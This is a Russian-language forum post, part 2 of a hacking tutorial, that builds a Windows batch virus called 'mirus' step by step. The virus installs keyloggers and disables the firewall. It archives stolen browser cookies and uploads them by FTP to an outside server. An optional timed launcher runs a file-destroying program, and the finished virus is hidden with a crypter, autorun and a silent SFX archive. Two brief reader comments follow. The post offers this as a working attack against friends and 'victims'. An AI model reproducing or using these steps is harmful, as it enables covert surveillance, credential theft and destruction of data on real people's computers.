Вирус "mirus" или начало пути Хакера[часть 2]

___
Теперь этап третий - будем ставить кейлоггеры. Если ты, ламер эдакий, не знаешь что это такое - то вот тебе объяснение (крутые мазахакеры могут не читать) - кейлоггер, эт такой хомячеГГ, который работает не хуже спецпоразделений КГБ. [фото 3]
Он, кароч, любое твое жмаканье мышкой, любое твое нажатие на клавиатуру, любой твой заход на любимый ред туб, любое набранное сообщение тут же отсылает мне на почту, фтп-шку или куда там еще. Вообщем, дорогой друг, если после прочтения этих строчек врачи заподозрили у тебя паранойю - то вполне возможно, что ты обо всем думаешь правильно.
Как таковых, существуют два вида кейлоггеров - с удаленной установкой и без удаленной установки. Кому нужен второй вид - я без понятия, потому что чем пытаться физически вручную установить вирусню на комп своего друга легче его допустим начать пытать. И сил умственных меньше потребуется и нервов и времени. Ну а коли товариСЧ про которого вы хотите узнать все - товарищем как бэ и не является, то забудьте идею с вторым видом вообще как страшный сон. А кейлоггеров первого вида, надо сказать, очень мало. Я тут весь гугл обрыл и накопал парочку, которые нам нужны.
Первый - это кейлоггер detective (скачать здесь). Охренненая штуковинка, вообще антивирями палиться не должна, я вам тут дал ссылку на скачку про версии с кряком, но есть большая вероятность того, что там будут пропускаться буквы а п р f g h. Вообщем вот вам скрин программы - фото_8
Я не знаю какой пережравшийся анаболиков яйцеголовый дегенерат может здесь чего-то не понять, но на случай, что среди аудитории чтецов этой статьи все-же такие найдутся - расписываю подробно-
1.строка e-mail, вписываем туда свое мыло - при профите на него получаем все логи
2.вписываем туда пароль от мыла (для сомневающихся - прога будет авторизоваться под твое мыло, затем с этого мыла на это же мыло логи отправлять)
3.самоудаление, в случае если тебя задолбают отчеты на почте о том, что твой друг опять ограбил банк - количество дней, через которые прожка удалиться.
4.серийник - вот вам кряГ, вписываете туда свое мыло, он вам дает серийник - получаем профит и радуемся жизни.
Итак, после того как все сделали - на рабочем столе у вас должен появиться exe-шник autoinstaller.exe. [тут же перемещаем его в %APPDATA%\virusna]. Вот запустите этот exe-шник на компе жертвы и все, все логи от ее мышки и клавы тут же летят к вам на почту.
Теперь не ссым и докидываем в код такую строчку -
start "%APPDATA%\virusna\autoinstaller.exe"
Теперь второй кейлоггер - GKLSpy
Надо сказать, что это реально крутой и простой в использовании кейлоггер. Ссылка на скачку вот - [ссыль]. Немного расскажу об использовании этого кейлоггера [фото_9]
1.Вписываем адрес сайта зареганого на хостингере
2.Вбиваем логин
3.Вбиваем пароль
4.Оставляем без изменений
5.Сюда вбиваем пароль, для просмотра логов.
6.Жмакаем на кнопку build
В папке с кейлоггером у нас должен появится файл server.exe. При включении этого файла автоматом врубается кейлоггер и отправляет все логи на хостинг.
Дописываем в код такую строчку -
start "%APPDATA%\virusna\server.exe"
Итак, на данный момент у нас код - [фото_10]
Терь этап четвертый. И самый последний. На самом деле я еще много чего мог сюда прибавить, и обязательно прибавлю в других частях, если эта статья будет пользоваться успехом. Ты же хочешь узнать о доступе к командной строке жертвы, доступе к диспетчеру устройств, о скрытом наблюдении за компом, взломе веб камеры, отрублении фаерволов и антивирусов, беспалевном внедрении вируса на комп лузера и так далее? Если хочешь, то все зависит от тебя, если реакция народа на эту статью будет нормальной - то я продолжу ваять выпуски, правда более углубленные чем этот. Здесь же я еще покажу тебе лишь то, как крыть компутер после получения логов. Итак, этап четвертый. Добавляется по желанию, как острые специи в рецепте с жареной курицей. Если ты люто ненавидишь жертву и желаешь ее скорейшей смээээрти - то сейчас я тебе покажу как по крайней мере накрыть ее комп с превращением в кашицу файлов на жестком диске. Если же ты хочешь, чтобы твой взлом остался незамечен и особого неприятия к жертве не испытваешь - просто пропусти этот этап.
Чтож, если ты решился - начнем. Для начала опять же не ссым и качаем эту прогу - wishmaster [ссыль на скачку]
Предупреждение - ни в коем случае не запусти это прогу случайно у себя - последствия будут плачевными.
Несколько лет назад моя команда написала эту программу и за ее работоспособность я отвечаю.
Итак, помещаем wishmaster.exe в папку %APPDATA%\virusna
Теперь подумаем, нам надо чтобы эта прога убила комп жертвы только после того, как пароли отошлются нам на сервяк и мы все узнаем. Это где то минута, две, ну на всякий случай три минуты. Три минуты это 180 сек. 180 сек это 180000 миллисекунд. Нам нужно 180000 миллисек времени, поэтому сначала создаем новый текстовый файл и пишем такую строчку -
ping -n 1 -w 180000 192.138.014.014 >nul // мы пытаемся пропинговать адрес 192.138.014.014 которого не существует. Ждем 180000 миллисекунд и затем просто убиваем весь вывод пинга.
start "%APPDATA%\virusna\wishmaster.exe" //стартуем whishmaster.exe
Вот скрин кода который у нас должен получиться - [фото_11]
Далее сохраняем этот файл с расширением .bat в папке %APPDATA%\virusna с названием startwishmaster.bat
Когда мы склепаем вирус мы будем все .bat переводить в .exe, так что в основном коде добавляем строчку -
start startwishmaster.exe

Вот вроде бы и все. Простейший вирус написан, осталось его только склепать. Он конечно будет палиться почти всеми антивирями (почти всеми, в конце мы пропустим его через криптор, но особо много надежд на это не возлагайте), о том как сделать чтобы он был беспалевен будет мой следующий выпуск. Ну или послеследующий.
Сейчас же, давай наконец склеем все это дело.
Итак, для начала отрубим брэндмауэр, чтобы он не блокировал отсылку наших кукисов (пункт 1) к нам. Для этого вставим в наш код такую строчку -
netsh advfirewall set allprofiles state off //полностью отрубает брэндмауэр винды
Вообще, эту строчку было бы неплохо вставить вообще в самое начало кода. Заново все скрины переделывать я не собираюсь, а вот ты вполне сможешь это сделать.
Теперь заставим отправлять нам кукисы с компа жертвы [как мы помним, все остальные проги отправляют нам логи либо на ftp, либо на почту].
Итак, как мы помним - все кукисы мы сохранили в папку %APPDATA%\virusna\opera и папку %APPDATA%\virusna\firefox, теперь мы должны эти две папки заархивировать и отправить на наш ftp сервер. Потому что просто папки, без архивации, передать на сервяк путем .bat нельзя. А в этом уроке мы будем пользоваться только средствами командной строки.
Архивировать их мы будем с помощью проги win rar и по идее она должна быть установлена в винду по умолчанию, но мало ли что, сейчас ее все больше меняют на другие архиваторы, так что если мы тихо установим ее еще раз - ничего страшного не будет.
Итак, качаем эти два инсталлера тихой установки win rar для x32 и x64 - [ссыль на x32][ссыль на x64]
Называем их x32 и x64, перекидываем их в папку %APPDATA%\virusna и докидываем в код вот такие строчки -
start "%APPDATA%\virusna\x32.exe"
start "%APPDATA%\virusna\x64.exe"
Отлично, теперь ждем 8 секунд, а вернее 8000 миллисекунд пока установится win rar
ping -n 1 -w 4000 192.138.014.014 >nul
Далее архивируем папку с кукисами такой командой:
set SrcPath="%APPDATA%\virusna\opera" //говорим компу какую папку надо архивировать
set DestPath=”%APPDATA%\virusna” //говорим компу в какую папку надо запиливать архив
set ArhName=opera //говорим компу имя архива
"C:\Program Files\WinRAR\WinRAR.exe" a -m5 -s -y -ep1 -r %DestPath%\%ArhName%_.rar %SrcPath%\*.* //даем компу инструкцию, шобы он запустил win rar и архивировал все это в скрытом режиме

Терь как болвнчики[2] делаем тоже самое с папкой firefox
set SrcPath="%APPDATA%\virusna\firefox"
set DestPath=”%APPDATA%\virusna”
set ArhName=firefox
"C:\Program Files\WinRAR\WinRAR.exe" a -m5 -s -y -ep1 -r %DestPath%\%ArhName%_.rar %SrcPath%\*.*

Терь пацаны, нам надо отправить эти два отчета на наш ftp сервяк. Поэтому создаем в папке %APPDATA%\virusna сначала файл ftp_command.txt и в нем пишем такие строчки -
u296220006 //логин входа на твой ftp сервяк
12345678910 //пароль входа на твой ftp сервяк
lcd %APPDATA%\virusna\firefox.rar //выбираем файл с куками
mput /s * //подгружаем его на наш сервяк

терь делаем все тоже самое только с opera.rar - создаем файл ftp_command2.txt и пишем в нем код:
296220006
12345678910
lcd %APPDATA%\virusna\opera.rar
mput /s *

Далее дописываем в наш основной код:
ftp -s:ftp_command.txt -i 185.28.20.65 //с помощью команды ftp и с помощью раннее созданного файла отправляем файл на ip адрес сервера (у тебя он будет другим)
ftp -s:ftp_command2.txt -i 185.28.20.65 //тоже самое только со вторым файлом
__
Ну вот и отлично. Последний этап вроде бы пройден, в конце у вас должно получиться такое -
[фото_12]
Теперь сохраняем файл в папку %APPDATA%\virusna c именем mirus.bat (обращаю внимание, мой уважаемый, что нужно именно mirus.bat а не mirus.bat.txt)

Вот так вот чувак. Сейчас мы еще склепаем этот наш вирь, но это даже не этап, это просто херня легкая. Качаем такую вот замечательную прожку, как bat to exe converter (ссыль вот), запускаем ее. Одновременно жмакаем сюда [ссыль на фото] и смотрим на фоту.
Указываем под пунктом 1 путь к нашему батнику, в пункте два указываем путь к выходу готового exe-шника. Затем в пункте 4 ставим, чтобы приложение было невидимо, ну и все, под пунктом пять жмакаем “комипилировать” и ищем по пути вывода готовый скомипилированный файл.
Далее:
Для тех кто решил убить комп жертвы -
тоже самое делаем с ранее созданным wishmaster.bat и добавляем его в ту же папку.

Теперь качаем такую вот хрень как OXI Joiner [ссылка] (вообщето не хрень, а замечательная прога). С ее помощью мы можем склеить сразу несколько файлов будь то вирусы или обычные картинки. Так же она нам поможет помочь тем, что с помощью нее можно добавить файлы в автозапуск и каждый раз когда у жертвы будет врубаться комп - будет тут же запускаться наш вирь. На этапе нуба, для которого я пишу эту статью - это самый быстрый способ.
Терь палим фотку - [фото_14]
Вообщем жмакаем на пункт 1, добавляем наш основной файл mirus.bat
Для тех кто зловредные мудаки - добавляем еще и wishmster.bat
Для тех кто не зловредные мудаки - кликаем правой кнопкой мышки по mirus.bat, выбираем “свойства” и там ставим галку напротив “скрытый” и “добавить в автазагрузку”. Далее возвращаемся в основной уровень и кликаем на кнопку под пунктом 3. Выбираем куда сохранять файл и его расширение. Пусть это будет папка %APPDATA%\virusna, а файл будет называться mirus.exe
Из %APPDATA%\virusna файл mirus.bat и для зловредных wishmaster.bat можно уже смело удалять.
Теперь качаем такую замечательную прогу, как Hexagon Crypter [ссыль[
Это криптор, один из лучших в своем роде. Пропустив через него свой файл ваш вирь еще долгое время не будут банить вообще никакие вири. Интерфейс там интуитивно понятный и я его даже расписывать не буду.
Когда мы на выходе получим готовый файл мы должны сделать последний штрих - берем win rar. Обыкновенный win rar. Жмакаем на “добавить архив” и во вкладке “общее” даем окончательное название - mirus.rar, затем жмакаем на “создать SFX-архив” и у нас автоматом имя превращается в mirus.exe.
Затем жмакаем на вкладку “файлы”, и там просто скопом тащим все файлы из %APPDATA%\virusna. Потом идем во вкладку “дополнительно” и там жмем - параметры SFX. В параметре “общие” в путь для распаковки вводим - %APPDATA%\virusna, затем перерубаемся на вкладку “установка” и там в поле “выполнить после распаковки” вводим - mirus.exe
Затем переходим во вкладку “режимы” и там выбираем пункт “скрыть все”.
Далее сохраняем все это, перерубаемся на вкладку “общие” и там жмакаем OK. Все, по адресу который вы ввели у нас должен появится mirus.exe. Это и есть наш вирус.

Итак, мы написали крутой вирь и как бог дал заклепали его. Вирус получился довольно громоздким, но что ты хотел чувак, это хакерство. Без труда не выловишь и рыбку из пруда. Если ты реально целеустремленный чел - ты смогешь одолеть этот первый базовый и самый трудный выпуск).Наличие следующего выпуска зависит напрямую от тебя, если народу понравится, все будут плюсовать и все такое - то я расскажу вам о хакерстве все что знаю сам и все что еще узнаю. У меня от тебя чувак, напротив монитора, нет секретов. В “теории” я буду с тобой заниматься методами взлома, а в “практике” буду рассказывать о социальной инженерии, методах впаривания, буду разбирать с тобой ходки и ошибки в них, буду выкладывать пароли и инфу. Вообщем как то так) Если у тебя есть для меня вопросы, cрок действия ссылок кончился или если у меня есть для меня заказы или еще что - милости прошу на мою страницу в вк - https://vk.com/blackkardinal.

Возблагодарим же Ктулху, за то что данная тема закончилась. Следующая тема, обещаю, будет более увлекательной и веселой.

 

kardinalmax, приведи статью в порядок, оформи нормально, чтоб читать было удобно.

 

Не смог дочитать, стиль написания - типичный майнер криптовалют)))